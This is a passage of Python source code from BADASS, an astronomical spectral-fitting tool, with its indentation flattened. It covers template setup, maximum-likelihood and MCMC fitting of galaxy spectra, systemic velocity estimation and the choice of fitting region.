# Prepare spectrum for fitting
# SDSS spectrum
if (sdss_spec):
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask = prepare_sdss_spec(fits_file, fit_reg, mask_bad_pix, mask_emline, user_mask, mask_metal, cosmology, run_dir, verbose=verbose, plot=True)
binnum = spaxelx = spaxely = None
# ifu spectrum
elif (ifu_spec):
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask,binnum,spaxelx,spaxely = prepare_ifu_spec(fits_file, fit_reg, mask_bad_pix, mask_emline, user_mask, mask_metal, cosmology, run_dir, verbose=verbose, plot=True)
# non-SDSS spectrum
elif (not sdss_spec):
lam_gal,galaxy,noise,z,ebv,velscale,fwhm_gal,fit_mask = prepare_user_spec(fits_file, spec, wave, err, fwhm, z, ebv, fit_reg, mask_emline, user_mask, mask_metal, cosmology, run_dir, verbose=verbose, plot=True)
binnum = spaxelx = spaxely = None
# Write to Log
write_log((fit_options,mcmc_options,comp_options,losvd_options,host_options,power_options,poly_options,opt_feii_options,uv_iron_options,balmer_options,
plot_options,output_options),'fit_information',run_dir)
####################################################################################################################################################################################
# Generate host-galaxy template
if (fit_host==True) & (lam_gal[0]>1680.2):
host_template = generate_host_template(lam_gal, host_options, fwhm_gal,fit_mask, velscale, verbose=verbose)
elif (fit_host==True) & (lam_gal[0]<1680.2):
host_template = None
fit_host = False
comp_options["fit_host"]=False
if verbose:
print('\n - Host galaxy SSP template disabled because template is outside of fitting region.')
elif (fit_host==False):
host_template = None
# Load stellar templates if fit_losvd=True
if (fit_losvd==True):
stel_templates = prepare_stellar_templates(galaxy, lam_gal, fit_reg, velscale, fwhm_gal,fit_mask, losvd_options, run_dir)
elif (fit_losvd==False):
stel_templates = None
# For the Optical FeII, UV Iron, and Balmer templates, we disable the templates if the fitting region
# is entirely outside of the range of the templates. This saves resources.
# Check conditions for and generate Optical FeII templates
# Veron-Cetty et al. (2004)
if (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="VC04") & (lam_gal[-1]>=3400.0) & (lam_gal[0]<=7200.0):
opt_feii_templates = initialize_opt_feii(lam_gal,opt_feii_options,fwhm_gal,fit_mask,velscale)
elif (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="VC04") & ((lam_gal[-1]<3400.0) | (lam_gal[0]>7200.0)):
if verbose:
print('\n - Optical FeII template disabled because template is outside of fitting region.')
fit_opt_feii = False
comp_options["fit_opt_feii"]=False
opt_feii_templates = None
write_log((),'update_opt_feii',run_dir)
# Kovacevic et al. (2010)
elif (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="K10") & (lam_gal[-1]>=4400.0) & (lam_gal[0]<=5500.0):
opt_feii_templates = initialize_opt_feii(lam_gal,opt_feii_options,fwhm_gal,fit_mask,velscale)
elif (fit_opt_feii==True) & (opt_feii_options["opt_template"]["type"]=="K10") & ((lam_gal[-1]<4400.0) | (lam_gal[0]>5500.0)):
if verbose:
print('\n - Optical FeII template disabled because template is outside of fitting region.')
opt_feii_templates = None
fit_opt_feii = False
comp_options["fit_opt_feii"]=False
opt_feii_templates = None
write_log((),'update_opt_feii',run_dir)
elif (fit_opt_feii==False):
opt_feii_templates = None
# Generate UV Iron template - Vestergaard & Wilkes (2001)
if (fit_uv_iron==True) & (lam_gal[-1]>=1074.0) & (lam_gal[0]<=3100.0):
uv_iron_template = initialize_uv_iron(lam_gal,uv_iron_options,fwhm_gal,fit_mask,velscale)
elif (fit_uv_iron==True) & ((lam_gal[-1]<1074.0) | (lam_gal[0]>3100.0)):
if verbose:
print('\n - UV Iron template disabled because template is outside of fitting region.')
uv_iron_template = None
fit_uv_iron = False
comp_options["fit_uv_iron"]=False
uv_iron_template = None
write_log((),'update_uv_iron',run_dir)
elif (fit_uv_iron==False):
uv_iron_template = None
# Generate Balmer continuum
if (fit_balmer==True) & (lam_gal[0]<3500.0):
balmer_template = initialize_balmer(lam_gal,balmer_options,fwhm_gal,fit_mask,velscale)
elif (fit_balmer==True) & (lam_gal[0]>=3500.0):
if verbose:
print('\n - Balmer continuum disabled because template is outside of fitting region.')
balmer_template = None
fit_balmer = False
comp_options["fit_balmer"]=False
balmer_template = None
write_log((),'update_balmer',run_dir)
elif (fit_balmer==False):
balmer_template = None
####################################################################################################################################################################################
# Initialize maximum likelihood parameters
if verbose:
print('\n Initializing parameters for Maximum Likelihood Fitting.')
print('----------------------------------------------------------------------------------------------------')
param_dict, line_list, combined_line_list, soft_cons = initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='init',fit_stat=fit_stat,
fit_opt_feii=fit_opt_feii,fit_uv_iron=fit_uv_iron,fit_balmer=fit_balmer,
fit_losvd=fit_losvd,fit_host=fit_host,fit_power=fit_power,fit_poly=fit_poly,
fit_narrow=fit_narrow,fit_broad=fit_broad,fit_outflow=fit_outflow,fit_absorp=fit_absorp,
tie_line_fwhm=tie_line_fwhm,tie_line_voff=tie_line_voff,verbose=verbose)
# Output all free parameters of fit prior to fitting (useful for diagnostics)
if output_pars and verbose:
output_free_pars(line_list,param_dict,soft_cons)
write_log((line_list,param_dict,soft_cons),'output_line_list',run_dir)
return
elif not output_pars and verbose:
output_free_pars(line_list,param_dict,soft_cons)
write_log((line_list,param_dict,soft_cons),'output_line_list',run_dir)
elif not output_pars and not verbose:
write_log((line_list,param_dict,soft_cons),'output_line_list',run_dir)
#### Line Testing ################################################################################################################################################################################
if (test_line["bool"]==True):
# If line test, check to make sure line is in line list
if (isinstance(test_line["line"],str)) and (test_line["line"] not in line_list):
shutil.rmtree(run_dir)
print("\n Line to test not found in line list! Make sure line is within fitting region for test.\n")
return
elif (isinstance(test_line["line"],list)) and not (np.all([False if line not in line_list else True for line in test_line["line"]])):
shutil.rmtree(run_dir)
print("\n Line to test not found in line list! Make sure line is within fitting region for test.\n")
return
if verbose:
print("\n Testing for %s" % (test_line["line"]))
line_test(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
fit_reg,
user_lines,
user_constraints,
combined_lines,
test_line,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=False,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose,
binnum=binnum,
spaxelx=spaxelx,
spaxely=spaxely)
# Exit BADASS
print(' - Line testing complete for %s! \n' % fits_file.parent.name)
return
####################################################################################################################################################################################
#### Outflow Testing ################################################################################################################################################################################
if (test_outflows==True):
# If test_outflow, check to make sure the line list has outflow lines in it
if (len([line for line in line_list if line_list[line]["line_type"]=="out"])==0):
shutil.rmtree(run_dir)
print("\n There are no outflow lines in the line list to test! Make sure fit_outflow = True and are within fitting range.\n")
return
if verbose:
print("\n Testing for outflows...")
line_test(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
fit_reg,
user_lines,
user_constraints,
combined_lines,
test_line,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=True,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose,
binnum=binnum,
spaxelx=spaxelx,
spaxely=spaxely)
# Exit BADASS
print(' - Outflow testing complete for %s! \n' % fits_file.parent.name)
return
####################################################################################################################################################################################
# Peform maximum likelihood
result_dict, comp_dict = max_likelihood(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat=fit_stat,
output_model=False,
test_outflows=False,
n_basinhop=n_basinhop,
max_like_niter=max_like_niter,
verbose=verbose)
if (mcmc_fit==False):
# If not performing MCMC fitting, terminate BADASS here and write
# parameters, uncertainties, and components to a fits file
# Write final parameters to file
# Header information
header_dict = {}
header_dict["z_sdss"] = z
header_dict["med_noise"] = np.median(noise)
header_dict["velscale"] = velscale
#
write_max_like_results(result_dict,comp_dict,header_dict,fit_mask,run_dir,binnum,spaxelx,spaxely)
# Make interactive HTML plot
if plot_HTML:
plotly_best_fit(fits_file.parent.name,line_list,fit_mask,run_dir)
print(' - Done fitting %s! \n' % fits_file.parent.name)
sys.stdout.flush()
return
#######################################################################################################
# Initialize parameters for emcee
if verbose:
print('\n Initializing parameters for MCMC.')
print('----------------------------------------------------------------------------------------------------')
param_dict, line_list, combined_line_list, soft_cons = initialize_pars(lam_gal,galaxy,noise,fit_reg,fwhm_gal,fit_mask,velscale,
comp_options,user_lines,user_constraints,combined_lines,losvd_options,host_options,power_options,poly_options,
opt_feii_options,uv_iron_options,balmer_options,
run_dir,fit_type='final',fit_stat=fit_stat,
fit_opt_feii=fit_opt_feii,fit_uv_iron=fit_uv_iron,fit_balmer=fit_balmer,
fit_losvd=fit_losvd,fit_host=fit_host,fit_power=fit_power,fit_poly=fit_poly,
fit_narrow=fit_narrow,fit_broad=fit_broad,fit_outflow=fit_outflow,fit_absorp=fit_absorp,
tie_line_fwhm=tie_line_fwhm,tie_line_voff=tie_line_voff,
remove_lines=False,verbose=verbose)
#
if verbose:
output_free_pars(line_list,param_dict,soft_cons)
#
# Replace initial conditions with best fit max. likelihood parameters (the old switcharoo)
for key in result_dict:
if key in param_dict:
param_dict[key]['init']=result_dict[key]['med']
# We make an exception for FeII temperature if Kovadevic et al. (2010) templates are used because
# temperature is not every sensitive > 8,000 K. This causes temperature parameter to blow up
# during the initial max. likelihood fitting, causing it to be initialized for MCMC at an
# unreasonable value. We therefroe re-initializethe FeiI temp start value to 10,000 K.
if 'feii_temp' in param_dict:
param_dict['feii_temp']['init']=10000.0
#######################################################################################################
# Run emcee
if verbose:
print('\n Performing MCMC iterations...')
print('----------------------------------------------------------------------------------------------------')
# Extract relevant stuff from dicts
param_names = [key for key in param_dict ]
init_params = [param_dict[key]['init'] for key in param_dict ]
bounds = [param_dict[key]['plim'] for key in param_dict ]
# Check number of walkers
# If number of walkers < 2*(# of params) (the minimum required), then set it to that
if nwalkers<2*len(param_names):
if verbose:
print('\n Number of walkers < 2 x (# of parameters)! Setting nwalkers = %d' % (2.0*len(param_names)))
nwalkers = int(2.0*len(param_names))
ndim, nwalkers = len(init_params), nwalkers # minimum walkers = 2*len(params)
# initialize walker starting positions based on parameter estimation from Maximum Likelihood fitting
pos = initialize_walkers(init_params,param_names,bounds,soft_cons,nwalkers,ndim)
# Run emcee
# args = arguments of lnprob (log-probability function)
lnprob_args=(param_names,
bounds,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir)
emcee_data = run_emcee(pos,ndim,nwalkers,run_dir,lnprob_args,init_params,param_names,
auto_stop,conv_type,min_samp,ncor_times,autocorr_tol,write_iter,write_thresh,
burn_in,min_iter,max_iter,verbose=verbose)
sampler_chain, burn_in, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, log_like_blob = emcee_data
# Add chains to each parameter in param dictionary
for k,key in enumerate(param_names):
if key in param_dict:
param_dict[key]['chain']=sampler_chain[:,:,k]
if verbose:
print('\n > Fitting MCMC chains...')
# These three functions produce parameter, flux, and luminosity histograms and chains from the MCMC sampling.
# Free parameter values, uncertainties, and plots
param_dict = param_plots(param_dict,burn_in,run_dir,plot_param_hist=plot_param_hist,verbose=verbose)
# Add tied parameters
param_dict = add_tied_parameters(param_dict, line_list)
# Log Like Function values plots
log_like_dict = log_like_plot(log_like_blob, burn_in, nwalkers, run_dir, plot_param_hist=plot_param_hist,verbose=verbose)
# Flux values, uncertainties, and plots
flux_dict = flux_plots(flux_blob, burn_in, nwalkers, run_dir, plot_flux_hist=plot_flux_hist,verbose=verbose)
# Luminosity values, uncertainties, and plots
lum_dict = lum_plots(flux_dict, burn_in, nwalkers, z, run_dir, H0=cosmology["H0"],Om0=cosmology["Om0"],plot_lum_hist=plot_lum_hist,verbose=verbose)
# Continuum luminosity
cont_lum_dict = cont_lum_plots(cont_flux_blob, burn_in, nwalkers, z, run_dir, H0=cosmology["H0"],Om0=cosmology["Om0"],plot_lum_hist=plot_lum_hist,verbose=verbose)
# Equivalent widths, uncertainties, and plots
eqwidth_dict = eqwidth_plots(eqwidth_blob, burn_in, nwalkers, run_dir, plot_eqwidth_hist=plot_eqwidth_hist, verbose=verbose)
# Auxiliary Line Dict (Combined FWHMs and Fluxes of MgII and CIV)
int_vel_disp_dict = int_vel_disp_plots(int_vel_disp_blob, burn_in, nwalkers, z, run_dir, H0=cosmology["H0"],Om0=cosmology["Om0"],plot_param_hist=plot_param_hist,verbose=verbose)
# If stellar velocity is fit, estimate the systemic velocity of the galaxy;
# SDSS redshifts are based on average emission line redshifts.
extra_dict = {}
extra_dict["LOG_LIKE"] = log_like_dict
if ('stel_vel' in param_dict):
if verbose:
print('\n > Estimating systemic velocity of galaxy...')
z_dict = systemic_vel_est(z,param_dict,burn_in,run_dir,plot_param_hist=plot_param_hist)
extra_dict = {**extra_dict, **z_dict}
if verbose:
print('\n > Saving Data...')
# Write all chains to a fits table
if (write_chain==True):
write_chains({**param_dict,**flux_dict,**lum_dict,**cont_lum_dict,**eqwidth_dict,**int_vel_disp_dict},run_dir)
# Plot and save the best fit model and all sub-components
comp_dict = plot_best_model(param_dict,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir)
# Calculate some fit quality parameters which will be added to the dictionary
# These will be appended to result_dict and need to be in the same format {"med": , "std", "flag":}
fit_quality_dict = fit_quality_pars(param_dict,line_list,combined_line_list,comp_dict,fit_mask,fit_type="mcmc",fit_stat=fit_stat)
param_dict = {**param_dict,**fit_quality_dict}
# Write best fit parameters to fits table
# Header information
header_dict = {}
header_dict["Z_SDSS"] = z
header_dict["MED_NOISE"] = np.median(noise)
header_dict["VELSCALE"] = velscale
#
param_dict = {**param_dict,**flux_dict,**lum_dict,**eqwidth_dict,**cont_lum_dict,**int_vel_disp_dict,**extra_dict}
write_params(param_dict,header_dict,bounds,run_dir,binnum,spaxelx,spaxely)
# Make interactive HTML plot
if plot_HTML:
plotly_best_fit(fits_file.parent.name,line_list,fit_mask,run_dir)
if verbose:
print('\n Cleaning up...')
print('----------------------------------------------------------------------------------------------------')
# Delete redundant files to cut down on space
cleanup(run_dir)
# Total time
elap_time = (time.time() - start_time)
if verbose:
print("\n Total Runtime = %s" % (time_convert(elap_time)))
# Write to log
write_log(elap_time,'total_time',run_dir)
print(' - Done fitting %s! \n' % fits_file.stem)
sys.stdout.flush()
return
##################################################################################
def initialize_walkers(init_params,param_names,bounds,soft_cons,nwalkers,ndim):
"""
Initializes the MCMC walkers within bounds and soft constraints.
"""
# Create refereence dictionary for numexpr
pdict = {}
for k in range(0,len(param_names),1):
pdict[param_names[k]] = init_params[k]
pos = init_params + 1.e-3 * np.random.randn(nwalkers,ndim)
# First iterate through bounds
for j in range(np.shape(pos)[1]): # iterate through parameter
for i in range(np.shape(pos)[0]): # iterate through walker
if (pos[i][j]<bounds[j][0]) | (pos[i][j]>bounds[j][1]):
while (pos[i][j]<bounds[j][0]) | (pos[i][j]>bounds[j][1]):
pos[i][j] = init_params[j] + 1.e-3*np.random.randn(1)
return pos
#### Calculate Sysetemic Velocity ################################################
def systemic_vel_est(z,param_dict,burn_in,run_dir,plot_param_hist=True):
"""
Estimates the systemic (stellar) velocity of the galaxy and corrects
the SDSS redshift (which is based on emission lines).
"""
c = 299792.458
# Get measured stellar velocity
stel_vel = np.array(param_dict['stel_vel']['chain'])
# Calculate new redshift
z_best = (z+1)*(1+stel_vel/c)-1
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(z_best)[1]):
burn_in = int(0.5*np.shape(z_best)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
flat = z_best[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat[np.isfinite(flat)]) > 0:
subsampled = np.random.choice(flat[np.isfinite(flat)],size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
if ((post_max-(3.0*low_68))<0):
flag = 1
else: flag = 0
z_dict = {}
z_dict["z_sys"] = {}
z_dict["z_sys"]["par_best"] = post_max
z_dict["z_sys"]["ci_68_low"] = low_68
z_dict["z_sys"]["ci_68_upp"] = upp_68
z_dict["z_sys"]["ci_95_low"] = low_95
z_dict["z_sys"]["ci_95_upp"] = upp_95
z_dict["z_sys"]["mean"] = post_mean
z_dict["z_sys"]["std_dev"] = post_std
z_dict["z_sys"]["median"] = post_med
z_dict["z_sys"]["med_abs_dev"] = post_mad
z_dict["z_sys"]["flat_chain"] = flat
z_dict["z_sys"]["flag"] = flag
else:
z_dict = {}
z_dict["z_sys"] = {}
z_dict["z_sys"]["par_best"] = np.nan
z_dict["z_sys"]["ci_68_low"] = np.nan
z_dict["z_sys"]["ci_68_upp"] = np.nan
z_dict["z_sys"]["ci_95_low"] = np.nan
z_dict["z_sys"]["ci_95_upp"] = np.nan
z_dict["z_sys"]["mean"] = np.nan
z_dict["z_sys"]["std_dev"] = np.nan
z_dict["z_sys"]["median"] = np.nan
z_dict["z_sys"]["med_abs_dev"] = np.nan
z_dict["z_sys"]["flat_chain"] = flat
z_dict["z_sys"]["flag"] = 1
return z_dict
##################################################################################
#### Find Nearest Function #######################################################
def find_nearest(array, value):
"""
This function finds the nearest value in an array and returns the
closest value and the corresponding index.
"""
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return array[idx],idx
##################################################################################
#### Convert Seconds to Minutes ##################################################
# Python Program to Convert seconds
# into hours, minutes and seconds
def time_convert(seconds):
"""
Converts runtimes in seconds to hours:minutes:seconds format.
"""
seconds = seconds % (24. * 3600.)
hour = seconds // 3600.
seconds %= 3600.
minutes = seconds // 60.
seconds %= 60.
return "%d:%02d:%02d" % (hour, minutes, seconds)
##################################################################################
#### Setup Directory Structure ###################################################
def setup_dirs(work_dir,verbose=True):
"""
This sets up the BADASS directory structure for each spectra. It creates
the "MCMC_output_#" folders.
"""
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
'''
return [ atoi(c) for c in re.split('(\d+)', text) ]
# Get list of folders in work_dir:
folders = glob.glob(work_dir+'MCMC_output_*')
folders.sort(key=natural_keys)
if (len(folders)==0):
if verbose:
print(' Folder has not been created. Creating MCMC_output folder...')
# Create the first MCMC_output file starting with index 1
os.mkdir(work_dir+'MCMC_output_1')
run_dir = os.path.join(work_dir,'MCMC_output_1/') # running directory
prev_dir = None
else:
# Get last folder name
s = folders[-1]
result = re.search('MCMC_output_(.*)', s)
# The next folder is named with this number
fnum = str(int(result.group(1))+1)
prev_num = str(int(result.group(1)))
# Create the first MCMC_output file starting with index 1
new_fold = work_dir+'MCMC_output_'+fnum+'/'
prev_fold = work_dir+'MCMC_output_'+prev_num+'/'
os.mkdir(new_fold)
run_dir = new_fold
if os.path.exists(prev_fold+'MCMC_chain.csv')==True:
prev_dir = prev_fold
else:
prev_dir = prev_fold
if verbose:
print(' Storing MCMC_output in %s' % run_dir)
return run_dir,prev_dir
##################################################################################
#### Determine fitting region ####################################################
# SDSS spectra
def determine_fit_reg_sdss(fits_file, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose):
"""
Determines the fitting region for SDSS spectra.
"""
# Limits of the stellar template wavelength range
# The stellar templates packaged with BADASS are from the Indo-US Coude Feed Stellar Template Library
# with the below wavelength ranges.
if (losvd_options["library"]=="IndoUS"):
min_losvd, max_losvd = 3460, 9464
if (losvd_options["library"]=="Vazdekis2010"):
min_losvd, max_losvd = 3540.5, 7409.6
if (losvd_options["library"]=="eMILES"):
min_losvd, max_losvd = 1680.2, 49999.4
# Open spectrum file
hdu = fits.open(fits_file)
specobj = hdu[2].data
z = specobj['z'][0]
# t = hdu['COADD'].data
t = hdu[1].data
lam_gal = (10**(t['loglam']))/(1+z)
gal = t['flux']
ivar = t['ivar']
and_mask = t['and_mask']
# Edges of wavelength vector
first_good = lam_gal[0]
last_good = lam_gal[-1]
if ((fit_reg=='auto') or (fit_reg=='full')):
# The lower limit of the spectrum must be the lower limit of our stellar templates
if ((fit_losvd==True) & (first_good < min_losvd)) | ((fit_losvd==True) & (last_good > max_losvd)):
if verbose:
print("\n Warning: Fitting LOSVD requires wavelenth range between %d Å and %d Å for stellar templates. BADASS will adjust your fitting range to fit the LOSVD..." % (min_losvd,max_losvd))
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
auto_low = np.max([min_losvd,first_good]) # Indo-US Library of Stellar Templates has a lower limit of 3460
# auto_upp = determine_upper_bound(first_good,last_good)
auto_upp = np.min([max_losvd,last_good])
# if (auto_upp is not None):
new_fit_reg = (np.floor(auto_low),np.ceil(auto_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
# elif (auto_upp is None):
# new_fit_reg = None
# return None, None
elif (fit_losvd==False):
new_fit_reg = (np.floor(first_good),np.ceil(last_good))
elif isinstance(fit_reg,(tuple,list)):
# Check to see if tuple/list makes sense
if ((fit_reg[0]>fit_reg[1]) | (fit_reg[1]<fit_reg[0])): # if boundaries overlap
if verbose:
print('\n Fitting boundaries overlap! \n')
new_fit_reg = None
return None, None
elif (fit_reg[0] > last_good) | (fit_reg[1] < first_good):
if verbose:
print('\n Fitting region not available! \n')
new_fit_reg = None
return None, None
elif ((fit_losvd==True) & (fit_reg[0]<min_losvd)) | ((fit_losvd==True) & (fit_reg[1]>max_losvd)):
if verbose:
print("\n Warning: Fitting LOSVD requires wavelenth range between 3460 A and 9464 A for stellar templates. BADASS will adjust your fitting range to fit the LOSVD...")
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([min_losvd,fit_reg[0],first_good])
wave_upp = np.min([max_losvd,fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:# (fit_losvd==False):
if (fit_reg[0] < first_good) | (fit_reg[1] > last_good):
if verbose:
print("\n Input fitting region exceeds available wavelength range. BADASS will adjust your fitting range automatically...")
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([fit_reg[0],first_good])
wave_upp = np.min([fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:
new_fit_reg = (np.floor(fit_reg[0]),np.ceil(fit_reg[1]))
# Determine number of good pixels in new fitting region
mask = ((lam_gal >= new_fit_reg[0]) & (lam_gal <= new_fit_reg[1]))
igood = np.where((gal[mask]>0) & (ivar[mask]>0) & (and_mask[mask]==0))[0]
ibad = np.where(and_mask[mask]!=0)[0]
good_frac = (len(igood)*1.0)/len(gal[mask])
if 0:
##################################################################################
fig = plt.figure(figsize=(14,6))
ax1 = fig.add_subplot(1,1,1)
ax1.plot(lam_gal,gal,linewidth=0.5)
ax1.axvline(new_fit_reg[0],linestyle='--',color='xkcd:yellow')
ax1.axvline(new_fit_reg[1],linestyle='--',color='xkcd:yellow')
ax1.scatter(lam_gal[mask][ibad],gal[mask][ibad],color='red')
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)')
ax1.set_xlabel(r'$\lambda_{\rm{rest}}$ ($\mathrm{\AA}$)')
plt.tight_layout()
plt.savefig(run_dir.joinpath('good_pixels.pdf'),fmt='pdf',dpi=150)
fig.clear()
plt.close()
##################################################################################
# Close the fits file
hdu.close()
##################################################################################
return new_fit_reg,good_frac
# User (non-SDSS) spectra
def determine_fit_reg_user(wave, z, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose):
"""
Determines valid fitting region for a user-input spectrum.
"""
# Limits of the stellar template wavelength range
# The stellar templates packaged with BADASS are from the Indo-US Coude Feed Stellar Template Library
# with the below wavelength ranges.
min_losvd = 3460
max_losvd = 9464
lam_gal = wave/(1+z)
# Edges of wavelength vector
first_good = lam_gal[0]
last_good = lam_gal[-1]
if ((fit_reg=='auto') or (fit_reg=='full')):
# The lower limit of the spectrum must be the lower limit of our stellar templates
if ((fit_losvd==True) & (first_good < min_losvd)) | ((fit_losvd==True) & (last_good > max_losvd)):
if verbose:
print("\n Warning: Fitting LOSVD requires wavelenth range between %d Å and %d Å for stellar templates. BADASS will adjust your fitting range to fit the LOSVD..." % (min_losvd,max_losvd))
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
auto_low = np.max([min_losvd,first_good]) # Indo-US Library of Stellar Templates has a lower limit of 3460
# auto_upp = determine_upper_bound(first_good,last_good)
auto_upp = np.min([max_losvd,last_good])
# if (auto_upp is not None):
new_fit_reg = (np.floor(auto_low),np.ceil(auto_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
# elif (auto_upp is None):
# new_fit_reg = None
# return None, None
elif (fit_losvd==False):
new_fit_reg = (np.floor(first_good),np.ceil(last_good))
elif isinstance(fit_reg,(tuple,list)):
# Check to see if tuple/list makes sense
if ((fit_reg[0]>fit_reg[1]) | (fit_reg[1]<fit_reg[0])): # if boundaries overlap
if verbose:
print('\n Fitting boundaries overlap! \n')
new_fit_reg = None
return None, None
elif (fit_reg[0] > last_good) | (fit_reg[1] < first_good):
if verbose:
print('\n Fitting region not available! \n')
new_fit_reg = None
return None, None
elif ((fit_losvd==True) & (fit_reg[0]<min_losvd)) | ((fit_losvd==True) & (fit_reg[1]>max_losvd)):
if verbose:
print("\n Warning: Fitting LOSVD requires wavelenth range between 3460 A and 9464 A for stellar templates. BADASS will adjust your fitting range to fit the LOSVD...")
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([min_losvd,fit_reg[0],first_good])
wave_upp = np.min([max_losvd,fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:# (fit_losvd==False):
if (fit_reg[0] < first_good) | (fit_reg[1] > last_good):
if verbose:
print("\n Input fitting region exceeds available wavelength range. BADASS will adjust your fitting range automatically...")
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([fit_reg[0],first_good])
wave_upp = np.min([fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:
new_fit_reg = (np.floor(fit_reg[0]),np.ceil(fit_reg[1]))
##################################################################################
return new_fit_reg,1.0
##################################################################################
#### Galactic Extinction Correction ##############################################
